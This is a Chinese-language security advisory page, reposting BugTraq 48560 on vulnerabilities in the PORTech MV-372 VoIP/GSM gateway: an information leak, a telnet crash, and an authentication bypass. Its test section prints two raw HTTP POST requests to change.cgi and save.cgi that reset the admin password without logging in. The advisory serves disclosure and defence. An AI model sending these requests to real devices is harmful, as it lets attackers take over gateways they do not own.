Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / Portech MV-372 VoIP网关多个安全漏洞

发布日期:2011-07-05
更新日期:2011-07-05受影响系统:
PORTech MV-372
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 48560MV-372是呼叫终端(VoIP到GSM/CDMA/UMTS)和源(GSM/CDMA/UMTS到VoIP)的2通道VoIP GSM/CDMA/UMTS网关。MV-372在VoIP网关的实现上存在多个安全漏洞,远程攻击者可利用这些漏洞获取敏感信息,造成受影响设备崩溃或通过发送特制的HTTP POST请求绕过某些安全限制。1)应用程序没有限制对info.htm的访问,可被利用泄露敏感信息。2)通过提供超长的密码,telnet服务中的错误可被利用造成服务崩溃。3)管理web界面的身份验证机制没有正确限制密码更改功能的访问,可通过发送特制的请求到web界面更改管理员密码。<*来源:Zsolt Imre
  *>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!POST http://&lt;device address&gt;/change.cgi HTTP/1.1
Host: &lt;device address&gt;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101
Firefox/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: hu-hu,hu;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://192.168.0.100/change.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 50Nuser=admin&amp;Npass=admin&amp;Nrpass=admin&amp;submit=Submit
POST http://&lt;device address&gt;/save.cgi
Host: &lt;device address&gt;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101
Firefox/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: hu-hu,hu;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://192.168.0.100/save.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 11submit=Save建议:
--------------------------------------------------------------------------------
厂商补丁:PORTech
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.portech.com.tw/p3-product1_1.asp?Pid=14Aruba Networks ArubaOS HTTP响应分隔和HTML注入漏洞Symantec Web Gateway Management GUI SQL注入漏洞(CVE-2011-0549)相关资讯      漏洞 
  • 快递官网漏洞泄露 1400 万用户信息  (08/12/2014 08:37:42)
  • 要389目录服务器访问绕过漏洞  (10/01/2012 09:18:08)
  • ASUS Net4Switch "ipswcom.dll"   (03/02/2012 09:32:42)
  • 软件漏洞是一笔大买卖!  (10/06/2012 08:28:32)
  • PHPCMS V9.1.13任意文件包含漏洞分  (08/01/2012 07:23:17)
  • Open Handset Alliance Android   (03/01/2012 06:59:34)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款
版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图